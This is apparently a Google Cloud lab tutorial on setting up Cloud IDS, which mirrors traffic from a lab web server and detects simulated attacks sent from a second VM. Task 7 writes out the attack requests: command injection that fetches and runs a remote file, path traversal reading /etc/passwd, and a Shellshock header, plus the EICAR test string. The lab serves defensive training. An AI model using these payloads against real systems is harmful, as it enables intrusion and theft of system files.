Getting Started with Cloud IDS

Lab: 1 hour 15 minutes, 5 Credits, Introductory

Note: This lab may incorporate AI tools to support your learning.

Overview

In this lab, you deploy Cloud Intrusion Detection System (Cloud IDS), a next-generation advanced intrusion detection service that provides threat detection for intrusions, malware, spyware, and command-and-control attacks. You simulate multiple attacks and view the threat details in the Google Cloud console.

[Diagram: Cloud IDS infrastructure]

Objectives

In this lab, you learn how to perform the following tasks:

  • Build out a Google Cloud networking environment as shown in the previous diagram.
  • Create a Cloud IDS endpoint.
  • Create two virtual machines using gcloud CLI commands.
  • Create a Cloud IDS packet mirroring policy.
  • Simulate attack traffic from a virtual machine.
  • View threat details in the Cloud console and Cloud Logging.

Setup

For each lab, you get a new Google Cloud project and set of resources for a fixed time at no cost.

  1. Click the Start Lab button. If you need to pay for the lab, a pop-up opens for you to select your payment method. On the left is the Lab Details panel with the following:

    • The Open Google Cloud console button
    • Time remaining
    • The temporary credentials that you must use for this lab
    • Other information, if needed, to step through this lab
  2. Click Open Google Cloud console (or right-click and select Open Link in Incognito Window if you are running the Chrome browser).

    The lab spins up resources, and then opens another tab that shows the Sign in page.

    Tip: Arrange the tabs in separate windows, side-by-side.

    Note: If you see the Choose an account dialog, click Use Another Account.
  3. If necessary, copy the Username below and paste it into the Sign in dialog.

    {{{user_0.username | "Username"}}}

    You can also find the Username in the Lab Details panel.

  4. Click Next.

  5. Copy the Password below and paste it into the Welcome dialog.

    {{{user_0.password | "Password"}}}

    You can also find the Password in the Lab Details panel.

  6. Click Next.

    Important: You must use the credentials the lab provides you. Do not use your Google Cloud account credentials. Note: Using your own Google Cloud account for this lab may incur extra charges.
  7. Click through the subsequent pages:

    • Accept the terms and conditions.
    • Do not add recovery options or two-factor authentication (because this is a temporary account).
    • Do not sign up for free trials.

After a few moments, the Google Cloud console opens in this tab.

Note: To view a menu with a list of Google Cloud products and services, click the Navigation menu at the top-left, or type the service or product name in the Search field.

Activate Google Cloud Shell

Google Cloud Shell is a virtual machine that is loaded with development tools. It offers a persistent 5GB home directory and runs on the Google Cloud.

Google Cloud Shell provides command-line access to your Google Cloud resources.

  1. In Cloud console, on the top right toolbar, click the Open Cloud Shell button.


  2. Click Continue.

It takes a few moments to provision and connect to the environment. When you are connected, you are already authenticated, and the project is set to your PROJECT_ID.

gcloud is the command-line tool for Google Cloud. It comes pre-installed on Cloud Shell and supports tab-completion.

  • You can list the active account name with this command:

    gcloud auth list

    Output:

    Credentialed accounts:
     - @.com (active)

    Example output:

    Credentialed accounts:
     - google1623327_student@qwiklabs.net

  • You can list the project ID with this command:

    gcloud config list project

    Output:

    [core]
    project =

    Example output:

    [core]
    project = qwiklabs-gcp-44776a13dea667a6

Note: Full documentation of gcloud is available in the gcloud CLI overview guide.

This lab will all be done using gcloud CLI commands inside Cloud Shell.

Task 1. Enable APIs

In this task you set the project ID variable and then enable the APIs required for the lab.

  1. In Cloud Shell, to set the PROJECT_ID environment variable, run the following command:

    export PROJECT_ID=$(gcloud config get-value project | sed '2d')

  2. Enable the Service Networking API:

    gcloud services enable servicenetworking.googleapis.com \
      --project=$PROJECT_ID

    If prompted to authorize the command, click Authorize.

  3. Enable the Cloud IDS API:

    gcloud services enable ids.googleapis.com \
      --project=$PROJECT_ID

  4. Enable the Cloud Logging API:

    gcloud services enable logging.googleapis.com \
      --project=$PROJECT_ID

Click Check my progress to verify the objective. Enable APIs.

Task 2. Build the Google Cloud networking footprint

In this task, you create a Google Cloud VPC network and configure private services access.

Private services access is a private connection between your VPC network and a network owned by Google or a third party. The entity offering the services, whether Google or the third party, is known as the service producer.

The private connection enables virtual machine (VM) instances in your VPC network and the services that you access to communicate exclusively by using internal IP addresses.

  1. In Cloud Shell, to create a VPC, run the following command:

    gcloud compute networks create cloud-ids \
      --subnet-mode=custom

    If prompted to authorize the command, click Authorize.

  2. Add a subnet to the VPC for mirrored traffic in us-east1:

    gcloud compute networks subnets create cloud-ids-useast1 \
      --range=192.168.10.0/24 \
      --network=cloud-ids \
      --region=us-east1

  3. Configure private services access:

    gcloud compute addresses create cloud-ids-ips \
      --global \
      --purpose=VPC_PEERING \
      --addresses=10.10.10.0 \
      --prefix-length=24 \
      --description="Cloud IDS Range" \
      --network=cloud-ids

  4. Create a private connection:

    gcloud services vpc-peerings connect \
      --service=servicenetworking.googleapis.com \
      --ranges=cloud-ids-ips \
      --network=cloud-ids \
      --project=$PROJECT_ID

Click Check my progress to verify the objective. Create a VPC.

Task 3. Create a Cloud IDS endpoint

In this task you create a Cloud IDS endpoint in us-east1 with a severity set to informational.

Cloud IDS uses a resource known as an IDS endpoint, a zonal resource that can inspect traffic from any zone in its region. Each IDS endpoint receives mirrored traffic and performs threat detection analysis.

Note: The creation of the IDS endpoint takes approximately 20 minutes.

  1. To create a Cloud IDS endpoint, in Cloud Shell, run the following command:

    gcloud ids endpoints create cloud-ids-east1 \
      --network=cloud-ids \
      --zone=us-east1-b \
      --severity=INFORMATIONAL \
      --async

  2. Verify that the Cloud IDS endpoint is initiated:

    gcloud ids endpoints list --project=$PROJECT_ID

    If the message Would you like to enable and retry appears, press Y.

    The output should be similar to this:

    ID: cloud-ids-east1
    LOCATION: us-east1-b
    SEVERITY: INFORMATIONAL
    STATE: CREATING
    NETWORK: cloud-ids
    TRAFFIC_LOGS:

Click Check my progress to verify the objective. Create a Cloud IDS endpoint.

Task 4. Create Firewall rules and Cloud NAT

In this task you create two firewall rules: allow-http-icmp and allow-iap-proxy.

To enable standard HTTP port (TCP 80) and ICMP connections to the server VM from all sources in the cloud-ids network, you define the allow-http-icmp rule.

To enable SSH connections to the VMs from the Identity-Aware Proxy IP range, you define the allow-iap-proxy rule.

You also configure Cloud Router and then configure Cloud NAT. As a prerequisite for Cloud NAT, a Cloud Router must first be configured in the same region. To provide internet access to VMs that don't have a public IP address, a Cloud NAT must be created in the same region. The VMs will be created without a public IP address to make sure that they are inaccessible from the internet. However, they will need access to the internet to download updates and files.

  1. To create the allow-http-icmp rule, in Cloud Shell, run the following command:

    gcloud compute firewall-rules create allow-http-icmp \
      --direction=INGRESS \
      --priority=1000 \
      --network=cloud-ids \
      --action=ALLOW \
      --rules=tcp:80,icmp \
      --source-ranges=0.0.0.0/0 \
      --target-tags=server

  2. Create the allow-iap-proxy rule:

    gcloud compute firewall-rules create allow-iap-proxy \
      --direction=INGRESS \
      --priority=1000 \
      --network=cloud-ids \
      --action=ALLOW \
      --rules=tcp:22 \
      --source-ranges=35.235.240.0/20

Click Check my progress to verify the objective. Add firewall rules to the VPC.

  3. To create a Cloud Router, run the following command:

    gcloud compute routers create cr-cloud-ids-useast1 \
      --region=us-east1 \
      --network=cloud-ids

  4. To configure a Cloud NAT, run the following command:

    gcloud compute routers nats create nat-cloud-ids-useast1 \
      --router=cr-cloud-ids-useast1 \
      --router-region=us-east1 \
      --auto-allocate-nat-external-ips \
      --nat-all-subnet-ip-ranges

Click Check my progress to verify the objective. Create a Cloud Router.

Task 5. Create two virtual machines

In this task, you create two virtual machines (VMs). The first virtual machine is your web server, whose traffic is mirrored to Cloud IDS. The second virtual machine is the source of your attack traffic.

You establish an SSH connection to your server via Identity-Aware Proxy (IAP), check the status of your web service server, create a benign malware file on the web server, and then add content to the file.

  1. To create the server virtual machine whose traffic is mirrored to Cloud IDS, in Cloud Shell, run the following command:

    gcloud compute instances create server \
      --zone=us-east1-b \
      --machine-type=e2-medium \
      --subnet=cloud-ids-useast1 \
      --no-address \
      --private-network-ip=192.168.10.20 \
      --metadata=startup-script=\#\!\ /bin/bash$'\n'sudo\ apt-get\ update$'\n'sudo\ apt-get\ -qq\ -y\ install\ nginx \
      --tags=server \
      --image=debian-11-bullseye-v20240709 \
      --image-project=debian-cloud \
      --boot-disk-size=10GB

    This command creates a Debian server in us-east1 and installs a simple web service (nginx) through the startup script.

  2. Create a virtual machine to be a client sending attack traffic:

    gcloud compute instances create attacker \
      --zone=us-east1-b \
      --machine-type=e2-medium \
      --subnet=cloud-ids-useast1 \
      --no-address \
      --private-network-ip=192.168.10.10 \
      --image=debian-11-bullseye-v20240709 \
      --image-project=debian-cloud \
      --boot-disk-size=10GB

    This command prepares a Debian server in us-east1 to use as your client.

Click Check my progress to verify the objective. Create a virtual machine.

Prepare your server

In this procedure, you validate your server and then create a benign malware payload for your client.

  1. To establish an SSH connection to your server via IAP, run the following command:

    gcloud compute ssh server --zone=us-east1-b --tunnel-through-iap

    This command prompts you through a series of steps to create an SSH key and the required directories.

  2. To agree to the directory creation prompt, type Y.

  3. When prompted for a passphrase, to use a blank passphrase, press ENTER twice.

You are now in the shell of your server VM.

Confirm that the web service is running

In this procedure, you check the status of your web service server. You create a benign malware file on the web server and then add content to the file.

  1. To check the status of your web service, run the following Linux command:

    sudo systemctl status nginx

    The output should be similar to this:

    ● nginx.service - A high performance web server and a reverse proxy server
         Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
         Active: active (running) since Tue 2021-05-25 18:01:49 UTC; 5h 24 min ago
           Docs: man:nginx(8)
       Main PID: 1347 (nginx)
          Tasks: 3 (limit: 4665)
         Memory: 4.5M
         CGroup: /system.slice/nginx.service
                 ├─1347 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
                 ├─1348 nginx: worker process
                 └─1349 nginx: worker process

    May 25 18:01:49 server systemd[1]: Starting A high performance web server and a reverse proxy server...
    May 25 18:01:49 server systemd[1]: Started A high performance web server and a reverse proxy server.

  2. Change directory to the web service:

    cd /var/www/html/

  3. Create a benign malware file on the web server. Run the following Linux command to create a text file:

    sudo touch eicar.file

  4. Add the following content to the newly created file:

    echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | sudo tee eicar.file

  5. Exit the server VM shell and return to Cloud Shell:

    exit

Task 6. Create a Cloud IDS packet mirroring policy

In this task, you create a Cloud IDS packet mirroring policy. This policy determines what traffic is mirrored to the Cloud IDS. You will then attach this policy to the newly created Cloud IDS endpoint.

As mentioned earlier, the Cloud IDS endpoint creation takes some time. Before you can proceed with this lab, the endpoint must be in an active/ready state.

  1. To verify that your Cloud IDS endpoint is active, in Cloud Shell, run the following command to show the current state of the Cloud IDS endpoint:

    gcloud ids endpoints list --project=$PROJECT_ID | grep STATE

    The output should be similar to this:

    STATE: READY

    Continue to run this command every few minutes until the state shows READY.
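Rather than re-running the list command by hand, the state can be polled from a small shell function. The script below is an added example and not part of the lab; it assumes the endpoint name cloud-ids-east1 and zone us-east1-b used in this lab, and reads the state with `gcloud ids endpoints describe --format="value(state)"`, the same describe command and value() formatter the lab uses to fetch the forwarding rule. The poll count, sleep interval and the RUN_WAIT variable are my own choices.

```bash
#!/bin/bash
# Added example, not part of the lab: poll the Cloud IDS endpoint until its
# state is READY instead of re-running `gcloud ids endpoints list` by hand.
# Assumes the endpoint name and zone from this lab; the state field is read
# with the same describe command and value() formatter the lab uses for the
# forwarding rule.

ENDPOINT="${ENDPOINT:-cloud-ids-east1}"
ZONE="${ZONE:-us-east1-b}"

# Prints the endpoint state (CREATING, READY, ...) on stdout. Kept as its own
# function so a stub can replace the gcloud call when exercising the loop.
get_endpoint_state() {
  gcloud ids endpoints describe "$ENDPOINT" --zone="$ZONE" --format="value(state)"
}

# wait_for_ready MAX_ATTEMPTS SLEEP_SECONDS
# Returns 0 once the state is READY, 1 on timeout or on any state other than
# CREATING (an endpoint that failed to create never becomes READY, so waiting
# out the full timeout would only hide the problem).
wait_for_ready() {
  max_attempts="${1:-30}"
  sleep_seconds="${2:-60}"
  attempt=1
  while [ "$attempt" -le "$max_attempts" ]; do
    state="$(get_endpoint_state)"
    case "$state" in
      READY)
        echo "endpoint $ENDPOINT is READY after $attempt poll(s)"
        return 0 ;;
      CREATING|"")
        # Empty state covers a describe call that failed transiently.
        echo "poll $attempt/$max_attempts: state=${state:-unknown}; retrying in ${sleep_seconds}s" >&2
        sleep "$sleep_seconds" ;;
      *)
        echo "endpoint $ENDPOINT is in unexpected state: $state" >&2
        return 1 ;;
    esac
    attempt=$((attempt + 1))
  done
  echo "timed out after $max_attempts polls waiting for $ENDPOINT to become READY" >&2
  return 1
}

# Usage: RUN_WAIT=1 bash wait_for_ids.sh   (polls every 60 s, up to 30 times)
if [ -n "${RUN_WAIT:-}" ]; then
  wait_for_ready 30 60
fi
```

Thirty polls at sixty seconds covers the roughly twenty minutes the lab quotes for endpoint creation with some margin; a non-zero exit lets a wrapper script stop before it tries to attach a packet mirroring policy to an endpoint that is not there.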

  2. Identify the Cloud IDS endpoint forwarding rule and confirm that the Cloud IDS endpoint state is READY:

    export FORWARDING_RULE=$(gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b --format="value(endpointForwardingRule)")
    echo $FORWARDING_RULE

    The output should be similar to this:

    https://www.googleapis.com/compute/v1/projects/md975a7fa0a53145dp-tp/regions/us-east1/forwardingRules/ids-fr-cloud--xkkerutlagop6opm

  3. Create and attach the packet mirroring policy:

    gcloud compute packet-mirrorings create cloud-ids-packet-mirroring \
      --region=us-east1 \
      --collector-ilb=$FORWARDING_RULE \
      --network=cloud-ids \
      --mirrored-subnets=cloud-ids-useast1

Click Check my progress to verify the objective. Create and attach the packet mirroring policy.

  4. Verify that the packet mirroring policy is created:

    gcloud compute packet-mirrorings list

    This gcloud command lists the packet mirroring policies and shows whether they are enabled/disabled.

    The output should be similar to this:

    NAME: cloud-ids-packet-mirroring
    REGION: us-east1
    NETWORK: cloud-ids
    ENABLE: TRUE

Task 7. Simulate attack traffic

In this task, you establish an SSH connection to your attacker virtual machine and simulate attack traffic from that virtual machine to your server. You do this by running a selection of curl commands that range from low severity to critical severity.

  1. To establish an SSH connection to your attacker virtual machine through IAP, in Cloud Shell, run the following command:

    gcloud compute ssh attacker --zone=us-east1-b --tunnel-through-iap

    Note: You are now in the shell of your attacker VM and not the Cloud Shell machine.

  2. Run the following curl requests in sequence to simulate low, medium, high, and critical severity alerts on the IDS:

    Low Severity:

    curl "http://192.168.10.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"

    Medium Severity:

    curl http://192.168.10.20/?item=../../../../WINNT/win.ini
    curl http://192.168.10.20/eicar.file

    High Severity:

    curl http://192.168.10.20/cgi-bin/../../../..//bin/cat%20/etc/passwd

    Critical Severity:

    curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://192.168.10.20/cgi-bin/test-critical

  3. Exit the attacker virtual machine shell and return to Cloud Shell:

    exit

Task 8. Review threats detected by Cloud IDS

In this task, you review the various attack traffic captured by the Cloud IDS in the Cloud console. The captured attack traffic profiles provide details of each threat.

  1. In the Google Cloud console, in the Navigation menu, click Network Security > Cloud IDS.

  2. Click the Threats tab.

    The Cloud IDS captured various attack traffic profiles and provided the details on each threat. You may need to click Refresh if you do not see any threats. You now dive a little deeper and view threat details.

  3. Locate the Bash Remote Code Execution Vulnerability threat, click More, and then select View threat details.

    Note: You may have noticed that there are multiple threats that produce the same name, for example, “Bash Remote Code Execution Vulnerability”. This is expected behavior.

    If you look closely, you will see that the session IDs of the threats are different. Since both VMs created are in the same subnet, we are seeing mirrored packets for both the client and server. Outbound packets from the client are being mirrored to IDS, and additionally, inbound packets to the server are being mirrored to IDS.

  4. Now you view the details of this incident in Cloud Logging. To return to the Threats page, click the left arrow.

  5. Click the Threats tab.

  6. Locate the Bash Remote Code Execution Vulnerability, click More, and then select View threat logs.

A new Cloud Logging tab opens that displays the same details. This enables you to send the logs to Cloud Storage, Chronicle, or any SIEM/SOAR. You can also create custom workflows to take remediation action based on alerts, like creating a Cloud Function that triggers on an alert and creating or updating a firewall rule to block the IP address, or creating or updating a Google Cloud Armor policy.
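The duplicate threat names with different session IDs matter once these logs feed a SIEM or an automated workflow: one request from the attacker VM can arrive as two entries, and a naive rule would fire twice. The script below is an added example and not part of the lab or of Cloud IDS itself; it collapses entries that differ only by session ID and keeps only those at or above a chosen severity. It assumes the entries are exported from Cloud Logging with the value() formatter as tab-separated fields, and that the jsonPayload field names (alert_severity, name, session_id, source_ip_address, destination_ip_address) and the log name ids.googleapis.com%2Fthreat match your project; confirm both against the Logs Explorer query that View threat logs opens. The sample lines are constructed; only the Bash Remote Code Execution Vulnerability name and the two VM addresses come from the lab.

```bash
#!/bin/bash
# Added example, not part of the lab. Collapses Cloud IDS threat log entries
# that differ only by session ID (the client-side and server-side mirror of
# the same request) and filters them by a minimum severity.
#
# Assumed jsonPayload field names and log name: confirm them against the
# Logs Explorer query that "View threat logs" opens in your project.

# Pulls one tab-separated line per threat entry from the last day:
#   severity <TAB> threat name <TAB> session id <TAB> source ip <TAB> destination ip
fetch_threat_lines() {
  gcloud logging read 'logName:"ids.googleapis.com%2Fthreat"' \
    --project="$PROJECT_ID" --freshness=1d \
    --format="value(jsonPayload.alert_severity,jsonPayload.name,jsonPayload.session_id,jsonPayload.source_ip_address,jsonPayload.destination_ip_address)"
}

# Keeps only lines whose severity is at or above MIN (stdin -> stdout).
# Cloud IDS severities, lowest to highest: INFORMATIONAL LOW MEDIUM HIGH CRITICAL.
at_least_severity() {
  case "$1" in
    INFORMATIONAL|LOW|MEDIUM|HIGH|CRITICAL) ;;
    *) echo "unknown severity: $1" >&2; return 2 ;;
  esac
  awk -F'\t' -v min="$1" '
    BEGIN { rank["INFORMATIONAL"]=0; rank["LOW"]=1; rank["MEDIUM"]=2
            rank["HIGH"]=3; rank["CRITICAL"]=4 }
    ($1 in rank) && rank[$1] >= rank[min] { print }'
}

# Groups lines by (severity, name, source, destination) and counts distinct
# session IDs per group, so the two mirrored copies of one request become one
# row with a session count of 2.
# Output: count <TAB> severity <TAB> name <TAB> source ip <TAB> destination ip
collapse_sessions() {
  awk -F'\t' '
    NF >= 5 {
      key = $1 "\t" $2 "\t" $4 "\t" $5
      if (!((key, $3) in seen)) { seen[key, $3] = 1; sessions[key]++ }
      if (!(key in first)) { first[key] = ++n; keys[n] = key }
    }
    END { for (i = 1; i <= n; i++) print sessions[keys[i]] "\t" keys[i] }'
}

# Constructed sample of what fetch_threat_lines might return after this lab's
# attack traffic. Session IDs and the two non-Bash threat names are made up.
SAMPLE_THREAT_LINES="$(printf '%s\t%s\t%s\t%s\t%s\n' \
  CRITICAL 'Bash Remote Code Execution Vulnerability' 1001 192.168.10.10 192.168.10.20 \
  CRITICAL 'Bash Remote Code Execution Vulnerability' 1002 192.168.10.10 192.168.10.20 \
  MEDIUM   'EICAR test file (constructed name)'       2001 192.168.10.10 192.168.10.20 \
  MEDIUM   'EICAR test file (constructed name)'       2002 192.168.10.10 192.168.10.20 \
  LOW      'Directory traversal (constructed name)'   3001 192.168.10.10 192.168.10.20)"

# Usage against the sample; set LIVE=1 to read from Cloud Logging instead.
if [ -n "${LIVE:-}" ]; then
  fetch_threat_lines | at_least_severity MEDIUM | collapse_sessions
else
  printf '%s\n' "$SAMPLE_THREAT_LINES" | at_least_severity MEDIUM | collapse_sessions
fi
```

Grouping on source and destination as well as the name is deliberate: two different clients tripping the same signature are two events, while the same client seen from both mirror points is one. The count column is also a quick sanity check that the mirroring policy covers both VMs, since a count of 1 for traffic between them means only one side was mirrored.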

Click Check my progress to verify the objective. Getting Started with Cloud IDS.

Congratulations!

In this lab, you did the following:

  1. Created a new VPC and deployed a Cloud IDS endpoint.

  2. Deployed two VMs, created a packet mirroring policy, and then sent attack traffic.

  3. Verified that the Cloud IDS captured the threats by viewing the threat details in the Cloud console and the threat logs in Cloud Logging.

More resources

Try out these labs to get more Cloud IDS experience:

End your lab

When you have completed your lab, click End Lab. Google Cloud Skills Boost removes the resources you’ve used and cleans the account for you.

You will be given an opportunity to rate the lab experience. Select the applicable number of stars, type a comment, and then click Submit.

The number of stars indicates the following:

  • 1 star = Very dissatisfied
  • 2 stars = Dissatisfied
  • 3 stars = Neutral
  • 4 stars = Satisfied
  • 5 stars = Very satisfied

You can close the dialog box if you don't want to provide feedback.

For feedback, suggestions, or corrections, please use the Support tab.

Copyright 2022 Google LLC All rights reserved. Google and the Google logo are trademarks of Google LLC. All other company and product names may be trademarks of the respective companies with which they are associated.
